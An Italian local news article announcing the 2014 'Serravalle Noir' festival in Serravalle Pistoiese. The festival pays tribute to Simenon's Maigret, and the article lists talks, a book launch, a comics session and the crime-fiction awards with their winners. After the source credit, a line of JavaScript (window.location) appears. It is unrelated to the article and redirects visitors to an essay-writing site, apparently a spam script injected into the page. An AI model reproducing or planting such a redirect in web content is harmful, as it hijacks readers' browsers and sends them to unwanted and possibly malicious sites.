«SERRAVALLE NOIR» RENDE OMAGGIO A SIMENON E AL SUO MAIGRET

La locandina
La locandina

SERRAVALLE. Il commissario Maigret sarà uno dei protagonisti dell’VIII “Serravalle Noir”, rassegna dedicata alla lettura poliziesca e al fumetto curata dal Club Amici del Giallo di Pistoia, in collaborazione con l’Assessorato alla Cultura del Comune di Serravalle Pistoiese, che il prossimo 6 settembre renderà omaggio George Simenon, nel venticinquesimo anniversario dalla scomparsa.

Dopo Dylan Dog, Eva Kant, Tex… nella locandina del Noir 2014, Maigret emerge in primo piano all’interno del loggiato della Chiesa di San Michele: nei manifesti della rassegna, infatti, cambia il protagonista ma l’ambientazione è sempre rigorosamente nel borgo di Serravalle.

“Con il Noir il borgo di Serravalle chiuderà un’estate ricca di manifestazioni che hanno richiamato tantissime persone – spiega l’Assessore alla Cultura e Vice Sindaco, Simona Querci –. Tutti gli eventi sono sempre a ingresso libero perché la cultura deve favorire l’aggregazione e la socializzazione tra la gente”.

“L’apertura della manifestazione è alle 16.45, nell’Oratorio della Vergine Assunta (via San Lodovico) – dice Stefano Fiori, giornalista e membro del Club del Giallo di Pistoia – Il giornalista Maurizio Testa, esperto conoscitore del commissario francese, e Giuseppe Prevìti, presidente del Club del Giallo di Pistoia, condurranno i colloqui dal titolo “Maigret a Serravalle: un “caso” da non perdere”. Alle 17.45 Luca Boschi, curatore di molte collane Disney, sarà il protagonista del Giallo Comics “Topolino e Paperino”. Alle 18.30, la presentazione del libro “Ogni giorno ha il suo male” (ed. Giunti). Sarà presente l’autore, Antonio Fusco, criminologo e capo della Squadra Mobile di Pistoia.

“Dal pomeriggio a sera, l’Ufficio Turistico del Comune di Serravalle Pistoiese sarà aperto, a disposizione per informazioni e gite turistiche per il borgo – annuncia l’Assessore Querci – Inoltre, prima dell’apertura ufficiale del Noir 2014 e dopo la chiusura della prima parte, sarà anche possibile visitare la Torra del Barbarossa: alle 16.00 e alle 19.30”. Durante il Noir 2014 sarà attivo anche un servizio di ristoro, dove sarà possibile cenare prima dell’inizio della premiazione.

Alle 21.00 i riflettori si accenderanno nella suggestiva Rocca di Castruccio, dove Simone Gai (Tvl) e da Cristina Bianchi (Club del Giallo) premieranno i vincitori del Noir 2014. La serata si aprirà con la lettura di alcuni estratti del racconto “Calici e doppieri d’argento”, a cura di Oscar Montani e ambientato a Serravalle. Successivamente sarà consegnata la “Targa Amicizia” a Giovanni Agnoloni, Riccardo Innocenti e Maurizio Testa.

Alle 21.30 la cerimonia di premiazione entrerà nel vivo con l’assegnazione dei cinque riconoscimenti: il “Serravalle Noir 2014” andrà al giallista Maurizio De Giovanni, il “Premio Roberto Santini” al colonnello dell’Arma e Giornalista, direttore della rivista Carabinieri, Roberto Riccardi, il “Premio Furio Innocenti” allo scrittore Simone Togneri, il “Premio Lucia Prioreschi” alla sceneggiatrice Francesca Bertuzzi. Infine, il “Premio speciale Fantasy, Horror and Mystery” sarà assegnato allo scrittore Eraldo Baldini. A tutti i premiati il noto caricaturista pistoiese Bac (alias Franco Bacci) donerà un disegno che li ritrae.

Alle 22.30 il dibattito sul tema: “Orrori familiari, quando gli assassini sono in casa” chiuderà questa edizione 2014.

[tasselli – comune serravalle]
window.location = “http://paper-help24h.com”;

Print Friendly, PDF & Email